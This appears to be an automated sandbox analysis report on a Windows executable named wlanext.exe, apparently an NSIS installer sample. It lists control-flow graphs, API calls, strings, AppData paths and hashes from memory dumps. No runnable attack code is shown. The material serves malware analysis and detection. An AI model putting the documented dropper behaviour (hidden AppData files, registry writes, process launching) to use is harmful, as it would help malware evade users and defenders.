                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                          • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$Triu,fe$$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 717251189-1685223899
                                                          • Opcode ID: 3c1c995c5f9bde827c4174b96e9e8874e10e0fc44bc72d96516fe9b754b6549c
                                                          • Instruction ID: 277d3937a9213029abeea5e1082be0a56f2569e83deff567e7d71b2b9830288d
                                                          • Opcode Fuzzy Hash: 3c1c995c5f9bde827c4174b96e9e8874e10e0fc44bc72d96516fe9b754b6549c
                                                          • Instruction Fuzzy Hash: 2B61E375900105AEDB209F24CD84BBF7BA4AB15314F52413FEA03BA2D2C67C8962CB5D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 493 401759-40177c call 402acb call 4059a5 498 401786-401798 call 405fa0 call 405938 lstrcatA 493->498 499 40177e-401784 call 405fa0 493->499 504 40179d-4017a3 call 40620a 498->504 499->504 509 4017a8-4017ac 504->509 510 4017ae-4017b8 call 4062a3 509->510 511 4017df-4017e2 509->511 518 4017ca-4017dc 510->518 519 4017ba-4017c8 CompareFileTime 510->519 513 4017e4-4017e5 call 405b14 511->513 514 4017ea-401806 call 405b39 511->514 513->514 521 401808-40180b 514->521 522 40187e-4018a7 call 4050c7 call 402f9c 514->522 518->511 519->518 524 401860-40186a call 4050c7 521->524 525 40180d-40184f call 405fa0 * 2 call 405fc2 call 405fa0 call 4056bc 521->525 536 4018a9-4018ad 522->536 537 4018af-4018bb SetFileTime 522->537 534 401873-401879 524->534 525->509 557 401855-401856 525->557 538 402960 534->538 536->537 540 4018c1-4018cc CloseHandle 536->540 537->540 544 402962-402966 538->544 542 4018d2-4018d5 540->542 543 402957-40295a 540->543 546 4018d7-4018e8 call 405fc2 lstrcatA 542->546 547 4018ea-4018ed call 405fc2 542->547 543->538 551 4018f2-4022ec call 4056bc 546->551 547->551 551->543 551->544 557->534 559 401858-401859 557->559 559->524
                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,renegaternes,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd,00000000,00000000,00000031), ref: 00401798
                                                          • CompareFileTime.KERNEL32(-00000014,?,renegaternes,renegaternes,00000000,00000000,renegaternes,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd,00000000,00000000,00000031), ref: 004017C2
                                                            • Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Agitationers Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD
                                                            • Part of subcall function 004050C7: lstrlenA.KERNEL32(Completed,00000000,00420FD4,756F110C,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                                            • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Completed,00000000,00420FD4,756F110C,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                                            • Part of subcall function 004050C7: lstrcatA.KERNEL32(Completed,004030F7,004030F7,Completed,00000000,00420FD4,756F110C), ref: 00405123
                                                            • Part of subcall function 004050C7: SetWindowTextA.USER32(Completed,Completed), ref: 00405135
                                                            • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000,Completed,00000000,00420FD4,756F110C), ref: 0040515B
                                                            • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                                            • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd$Triu,fe$$Urbacity\Uninstall\deltransformations$renegaternes
                                                          • API String ID: 1941528284-3651119794
                                                          • Opcode ID: 314d660de66636c29a68347d349d4073d53d9a3baf3ac9617792df369dcc4375
                                                          • Instruction ID: 9917b4e32c30e3d06e99a245a18197bb2030eb542a9362b48aff858cdbf0b6bf
                                                          • Opcode Fuzzy Hash: 314d660de66636c29a68347d349d4073d53d9a3baf3ac9617792df369dcc4375
                                                          • Instruction Fuzzy Hash: C541A571A00515BACF107BA5CD45EAF3678EF45368F60823FF421F20E1D67C8A418AAE

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 560 4050c7-4050dc 561 405192-405196 560->561 562 4050e2-4050f4 560->562 563 4050f6-4050fa call 405fc2 562->563 564 4050ff-40510b lstrlenA 562->564 563->564 566 405128-40512c 564->566 567 40510d-40511d lstrlenA 564->567 568 40513b-40513f 566->568 569 40512e-405135 SetWindowTextA 566->569 567->561 570 40511f-405123 lstrcatA 567->570 571 405141-405183 SendMessageA * 3 568->571 572 405185-405187 568->572 569->568 570->566 571->572 572->561 573 405189-40518c 572->573 573->561
                                                          APIs
                                                          • lstrlenA.KERNEL32(Completed,00000000,00420FD4,756F110C,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                                          • lstrlenA.KERNEL32(004030F7,Completed,00000000,00420FD4,756F110C,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                                          • lstrcatA.KERNEL32(Completed,004030F7,004030F7,Completed,00000000,00420FD4,756F110C), ref: 00405123
                                                          • SetWindowTextA.USER32(Completed,Completed), ref: 00405135
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000,Completed,00000000,00420FD4,756F110C), ref: 0040515B
                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID: Completed
                                                          • API String ID: 2531174081-3087654605
                                                          • Opcode ID: df169b469795bd748155a1bed2d77fa091380b27c3cf4036283bd74b1758659f
                                                          • Instruction ID: 4d1d9eb5ffa78b07b8376cbf0c4e91ada4ce3c5a86d4cc872ddc87c593067670
                                                          • Opcode Fuzzy Hash: df169b469795bd748155a1bed2d77fa091380b27c3cf4036283bd74b1758659f
                                                          • Instruction Fuzzy Hash: 69214A71900518BADB119FA5CD84A9FBFA9EB09354F14807AF944AA291C7398E418F98

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 574 402f9c-402fb0 575 402fb2 574->575 576 402fb9-402fc2 574->576 575->576 577 402fc4 576->577 578 402fcb-402fd0 576->578 577->578 579 402fe0-402fed call 4031ae 578->579 580 402fd2-402fdb call 4031c4 578->580 584 402ff3-402ff7 579->584 585 40319c 579->585 580->579 586 403147-403149 584->586 587 402ffd-403046 GetTickCount 584->587 588 40319e-40319f 585->588 592 403189-40318c 586->592 593 40314b-40314e 586->593 589 4031a4 587->589 590 40304c-403054 587->590 591 4031a7-4031ab 588->591 589->591 594 403056 590->594 595 403059-403067 call 4031ae 590->595 596 403191-40319a call 4031ae 592->596 597 40318e 592->597 593->589 598 403150 593->598 594->595 595->585 607 40306d-403076 595->607 596->585 608 4031a1 596->608 597->596 601 403153-403159 598->601 602 40315b 601->602 603 40315d-40316b call 4031ae 601->603 602->603 603->585 611 40316d-403179 call 405be0 603->611 610 40307c-40309c call 40645d 607->610 608->589 616 4030a2-4030b5 GetTickCount 610->616 617 40313f-403141 610->617 618 403143-403145 611->618 619 40317b-403185 611->619 620 4030b7-4030bf 616->620 621 4030fa-4030fc 616->621 617->588 618->588 619->601 624 403187 619->624 625 4030c1-4030c5 620->625 626 4030c7-4030f2 MulDiv wsprintfA call 4050c7 620->626 622 403133-403137 621->622 623 4030fe-403102 621->623 622->590 629 40313d 622->629 627 403104-40310b call 405be0 623->627 628 403119-403124 623->628 624->589 625->621 625->626 633 4030f7 626->633 634 403110-403112 627->634 632 403127-40312b 628->632 629->589 632->610 635 403131 632->635 633->621 634->618 636 403114-403117 634->636 635->589 636->632
                                                          APIs
                                                          • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00403003
                                                          • GetTickCount.KERNEL32(0040B860,00415428,00004000), ref: 004030AA
                                                          • MulDiv.KERNEL32 ref: 004030D3
                                                          • wsprintfA.USER32 ref: 004030E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: (TA$(TA$... %d%%
                                                          • API String ID: 551687249-2950751476
                                                          • Opcode ID: 9cc729fb03587e77d36b85ec2d3e28e988b6cfa12a4048dcf9b453659f184ac0
                                                          • Instruction ID: 5c281e24a88a3bae7ae2a550c5808c60fec2149314028a17d76778b6f2aa7d1b
                                                          • Opcode Fuzzy Hash: 9cc729fb03587e77d36b85ec2d3e28e988b6cfa12a4048dcf9b453659f184ac0
                                                          • Instruction Fuzzy Hash: BB518171900219DBDB00DF66DA4479E7BB8EF4875AF10453BE814BB2D0C7789E40CBA9

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 637 4062ca-4062ea GetSystemDirectoryA 638 4062ec 637->638 639 4062ee-4062f0 637->639 638->639 640 406300-406302 639->640 641 4062f2-4062fa 639->641 643 406303-406335 wsprintfA LoadLibraryExA 640->643 641->640 642 4062fc-4062fe 641->642 642->643
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104,UXTHEME), ref: 004062E1
                                                          • wsprintfA.USER32 ref: 0040631A
                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%s.dll$UXTHEME$\
                                                          • API String ID: 2200240437-4240819195
                                                          • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                          • Instruction ID: 4b2e1b96e526c3afc1937c3159904a09e8452480974eeaf1dbd8ebd71d3b02b5
                                                          • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                          • Instruction Fuzzy Hash: 87F0F63050060AABEB14AB74DD0DFEB375CAB08305F14047AAA87E11C1EA78D9398B9C

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 644 405b68-405b72 645 405b73-405b9e GetTickCount GetTempFileNameA 644->645 646 405ba0-405ba2 645->646 647 405bad-405baf 645->647 646->645 648 405ba4 646->648 649 405ba7-405baa 647->649 648->649
                                                          APIs
                                                          • GetTickCount.KERNEL32(75712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\wlanext.exe" ,0040320A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405B7C
                                                          • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 00405B96
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6B
                                                          • "C:\Users\user\AppData\Roaming\wlanext.exe" , xrefs: 00405B68
                                                          • nsa, xrefs: 00405B73
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: "C:\Users\user\AppData\Roaming\wlanext.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-433979307
                                                          • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                          • Instruction ID: 343f4ea9f9204f9b983ce224a42535e265f7560d01468737dbca66c928219fc6
                                                          • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                          • Instruction Fuzzy Hash: 59F0A7363082087BDB108F56DD04B9B7BADDF91750F10803BFA48DB290D6B4E9548B58

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 650 402bcd-402bf6 call 405e26 652 402bfb-402bfd 650->652 653 402c75-402c79 652->653 654 402bff-402c05 652->654 655 402c21-402c36 RegEnumKeyA 654->655 656 402c07-402c09 655->656 657 402c38-402c4a RegCloseKey call 406338 655->657 659 402c59-402c67 RegCloseKey 656->659 660 402c0b-402c1f call 402bcd 656->660 663 402c69-402c6f RegDeleteKeyA 657->663 664 402c4c-402c57 657->664 659->653 660->655 660->657 663->653 664->653
                                                          APIs
                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C3B
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C5C
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Close$Enum
                                                          • String ID:
                                                          • API String ID: 464197530-0
                                                          • Opcode ID: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
                                                          • Instruction ID: bf26dd322600c86e705ae03821e5e95be148f4b98a6ddde11b8b46473537de7c
                                                          • Opcode Fuzzy Hash: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
                                                          • Instruction Fuzzy Hash: 0E115832504109FBEF129F90CF09F9E7B69AB08380F104076BD45B51E0EBB59E11AAA8

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 667 4015bb-4015ce call 402acb call 4059d1 672 4015d0-4015e3 call 405963 667->672 673 401624-401627 667->673 680 4015e5-4015e8 672->680 681 4015fb-4015fc call 40560a 672->681 674 401652-402242 call 401423 673->674 675 401629-401644 call 401423 call 405fa0 SetCurrentDirectoryA 673->675 690 402957-402966 674->690 691 40271c-402723 674->691 675->690 694 40164a-40164d 675->694 680->681 684 4015ea-4015f1 call 405627 680->684 692 401601-401603 681->692 684->681 698 4015f3-4015f9 call 40558d 684->698 691->690 695 401605-40160a 692->695 696 40161a-401622 692->696 694->690 699 401617 695->699 700 40160c-401615 GetFileAttributesA 695->700 696->672 696->673 698->692 699->696 700->696 700->699
                                                          APIs
                                                            • Part of subcall function 004059D1: CharNextA.USER32(?), ref: 004059DF
                                                            • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
                                                            • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8
                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                            • Part of subcall function 0040558D: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0
                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd,00000000,00000000,000000F0), ref: 0040163C
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd, xrefs: 00401631
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd
                                                          • API String ID: 1892508949-954670299
                                                          • Opcode ID: 24723478155056ce44161477fb326503c5b700edecc591072070bbe499807ef2
                                                          • Instruction ID: df45c6993d6bc62f872b04d9318ddfa5d1dc0af5cd0ca16cddc76749c9d8dee7
                                                          • Opcode Fuzzy Hash: 24723478155056ce44161477fb326503c5b700edecc591072070bbe499807ef2
                                                          • Instruction Fuzzy Hash: B6112731608152EBCF217BB54D419BF66B0DA92324F68093FE5D1B22E2D63D49439A3F

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 704 40563f-405670 CreateProcessA 705 405672-40567b CloseHandle 704->705 706 40567e-40567f 704->706 705->706
                                                          APIs
                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 00405668
                                                          • CloseHandle.KERNEL32(?), ref: 00405675
                                                          Strings
                                                          • Error launching installer, xrefs: 00405652
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                                                          • Instruction ID: cd0db04dc70eb2db95c0507bc2818c98f3fa4352d1ad4fdf37015ca79918bc5c
                                                          • Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                                                          • Instruction Fuzzy Hash: 2FE046F0640209BFEB109FB0EE49F7F7AADEB00704F404561BD00F2190EA7498088A7C

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 707 4023d6-402407 call 402acb * 2 call 402b5b 714 402957-402966 707->714 715 40240d-402417 707->715 717 402427-40242a 715->717 718 402419-402426 call 402acb lstrlenA 715->718 720 40242c-40243d call 402aa9 717->720 721 40243e-402441 717->721 718->717 720->721 725 402452-402466 RegSetValueExA 721->725 726 402443-40244d call 402f9c 721->726 729 402468 725->729 730 40246b-402548 RegCloseKey 725->730 726->725 729->730 730->714 732 40271c-402723 730->732 732->714
                                                          APIs
                                                          • lstrlenA.KERNEL32(0040AC18,00000023,00000011,00000002), ref: 00402421
                                                          • RegSetValueExA.KERNEL32(?,?,?,?,0040AC18,00000000), ref: 0040245E
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402542
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: CloseValuelstrlen
                                                          • String ID:
                                                          • API String ID: 2655323295-0
                                                          • Opcode ID: 4f16d4bf7909d29b697dbe6c79f78a3acee279fd1b41d6286fcb43dda6c46c2e
                                                          • Instruction ID: 52a398de0ffa64e75c678b0ba9290c89a7bc7a6ef294ba5bc2d5d90b06733894
                                                          • Opcode Fuzzy Hash: 4f16d4bf7909d29b697dbe6c79f78a3acee279fd1b41d6286fcb43dda6c46c2e
                                                          • Instruction Fuzzy Hash: C8118171E00215BEEB10EFA59E49AAEBA74EB54318F20843BF504F71D1CAB94D419B68
                                                          APIs
                                                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402517
                                                          • RegEnumValueA.ADVAPI32 ref: 0040252A
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402542
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
